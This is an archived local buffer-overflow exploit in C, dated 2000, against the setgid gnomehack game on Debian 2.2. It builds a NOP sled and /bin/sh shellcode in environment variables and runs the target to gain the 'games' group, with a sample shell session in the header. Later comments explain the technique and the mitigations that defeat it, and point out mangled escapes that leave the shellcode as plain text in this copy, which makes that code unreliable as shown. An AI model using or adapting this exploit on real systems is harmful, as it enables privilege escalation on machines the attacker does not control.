
# Title : GnomeHack Local Buffer Overflow Exploit (gid=games)
# Published : 2000-12-04
# Author : Cody Tubbs


/*
 * (gnomehack) local buffer overflow. (gid=games(60))
 *
 * Author: Cody Tubbs (loophole of hhp).
 * www.hhp-programming.net / pigspigs@yahoo.com
 * 12/17/2000
 *
 * Tested on Debian 2.2, kernel 2.2.17 - x86.
 * sgid "games"(60) by default.
 *
 * bash-2.03$ id
 * uid=1000(loophole) gid=501(noc)
 * bash-2.03$ ./h 0 0
 * Ret-addr 0x7fffe81c, offset: 0, allign: 0.
 * Can't resolve host name "????????????????"!
 * sh-2.03$ id
 * uid=1000(loophole) gid=501(noc) egid=60(games)
 * sh-2.03$
 */

#include <stdio.h>

#define OFFSET 0
#define ALLIGN 0
#define NOP    0x90
#define DBUF   256 //120(RET*30)+((RET))+132(RET*33)
#define GID    60

/*
 * Payload bytes stored as a string literal. In this archived copy the
 * backslashes of the \x escapes are missing, so as shown the literal is plain
 * text rather than machine code. main() overwrites indexes 10, 22 and 24 with
 * GID before the string is used. The tail "x2fx62x69x6ex2fx73x68" spells
 * "/bin/sh" — a string worth alerting on when it shows up inside environment
 * variables handed to setgid/setuid processes.
 */
static char shellcode[]=
  "x31xdbx31xc9xbbxffxffxffxffxb1x00x31xc0"
  "xb0x47xcdx80x31xdbx31xc9xb3x00xb1x00x31"
  "xc0xb0x47xcdx80xebx1fx5ex89x76x08x31xc0"
  "x88x46x07x89x46x0cxb0x0bx89xf3x8dx4ex08"
  "x8dx56x0cxcdx80x31xdbx89xd8x40xcdx80xe8"
  "xdcxffxffxffx2fx62x69x6ex2fx73x68x69";

/*
 * Returns the current stack pointer. This relies on i386 ABI details: %eax is
 * the integer return register and there is no C return statement, so the
 * value left by "movl %esp,%eax" survives only if the compiler emits nothing
 * that clobbers %eax before ret. Not portable beyond 32-bit x86, and fragile
 * under optimisation (the missing return is undefined behaviour if the
 * caller uses the result).
 */
long get_sp(void){
  __asm__("movl %esp,%eax");
}

/*
 * Prints the usage banner to stderr and terminates the process with status 1.
 *
 * @param heh  argv[0], echoed into the usage lines.
 *
 * Notes: the "\n" escapes appear as a bare 'n' in this archived copy, and
 * exit() is called without <stdlib.h> (only <stdio.h> is included at the top
 * of the file), i.e. an implicit declaration.
 */
void workit(char *heh){
  fprintf(stderr, "ngnomehack local exploit for Debian 2.2 - x86n");
  fprintf(stderr, "Author: Cody Tubbs (loophole of hhp)nn");
  fprintf(stderr, "Usage: %s <offset> [allign(0..3)]n", heh);
  fprintf(stderr, "Examp: %s 0n", heh);
  fprintf(stderr, "Examp: %s 0 1n", heh);
  exit(1);
}

/*
 * Entry point (implicit int return type and no return statement — pre-C99
 * style).
 *
 * Builds two environment variables in stack buffers and then execs the target
 * binary so that it inherits them:
 *   DISPLAY = the contents of eipeip (a block of repeated return addresses)
 *   HACKEX  = a run of NOP bytes followed by the payload string
 * argv[1] is an offset subtracted from the stack pointer, argv[2] an optional
 * alignment the usage text documents as 0..3; neither value is range-checked.
 *
 * Defender's reading: the technique depends on the target copying an
 * attacker-controlled environment variable into a fixed-size stack buffer
 * while running with a privileged group id, and on the stack sitting at a
 * predictable address. Stack protectors, non-executable stacks and
 * address-space randomisation each break the fixed return-address assumption
 * made below, and not installing game binaries setgid removes the privilege
 * gain entirely.
 */
main(int argc, char **argv){
  char eipeip[DBUF], buffer[4096], heh[DBUF+1];  /* eipeip: address block, never NUL-terminated; buffer: NOP sled + payload; heh: the DISPLAY= string */
  int i, offset, gid, allign;
  long address;

  if(argc < 2){
    workit(argv[0]);  /* usage + exit(1); argv[1] is mandatory */
  }
 
  if(argc > 1){
    offset = atoi(argv[1]);  /* atoi reports no errors: non-numeric text silently becomes 0 */
  }else{
    offset = OFFSET;  /* not reachable after the argc < 2 exit above */
  }

  if(argc > 2){
    allign = atoi(argv[2]);  /* documented range 0..3, but nothing enforces it */
  }else{
    allign = ALLIGN;
  }

  address = get_sp() - offset;  /* guess at where the payload will sit in the target's stack; only meaningful without ASLR */

  if(allign > 0){
    for(i=0;i<allign;i++){
      eipeip[i] = 0x69; //0x69.DOOT:D
    }
  }

  /* Fill the rest of eipeip with the address, 4 bytes at a time through a
   * type-punned store (strict-aliasing UB, and assumes sizeof(long) == 4).
   * NOTE(review): with allign in 1..3 the final store starts at
   * eipeip[253..255] and spills up to 3 bytes past the array; a negative
   * allign would start writing before it. */
  for(i=allign;i<DBUF;i+=4){
    *(long *)&eipeip[i] = address;
  }

  gid = GID;
  /* Patch the group id into three payload bytes; per the author's header the
   * payload is meant to set gid=60(games). Which instruction operands these
   * indexes correspond to cannot be verified from the mangled literal. */
  shellcode[10] = gid;
  shellcode[22] = gid;
  shellcode[24] = gid;
 
  /* NOP sled. eipeip has no terminator, so strlen(eipeip) reads whatever
   * follows it on the stack. The condition compares int i with a size_t
   * expression, so if the subtraction ever goes negative it wraps to a huge
   * unsigned value and the loop would overrun buffer. */
  for(i=0;i<(4096-strlen(shellcode)-strlen(eipeip));i++){
    buffer[i] = NOP;
  }
 
  memcpy(heh, eipeip, strlen(eipeip));  /* same unterminated strlen as above; heh is DBUF+1 bytes */
  /* The first 8 address bytes are replaced by the variable name, so the
   * value seen by the target is eipeip[8..]. */
  memcpy(heh, "DISPLAY=", 8);//HOME||DISPLAY
  putenv(heh);  /* putenv keeps the pointer itself; heh stays valid only until the exec below replaces the image */

  memcpy(buffer+i, shellcode, strlen(shellcode));  /* payload appended directly after the sled */
  memcpy(buffer, "HACKEX=", 7);
  putenv(buffer);  /* buffer is never explicitly NUL-terminated after the payload; termination depends on uninitialised stack bytes */
 
  /* %#x with a long argument is a format/type mismatch on LP64 targets. */
  fprintf(stderr, "Ret-addr %#x, offset: %d, allign: %d.n",address, offset, allign);
  /* The variadic terminator should be (char *)NULL rather than a bare 0, which
   * is UB where int and pointer sizes differ. execlp is used without
   * <unistd.h>; on failure it returns and main falls off the end. */
  execlp("/usr/lib/games/gnomehack/gnomehack", "gnomehack", 0); //Mod path if needed.
}

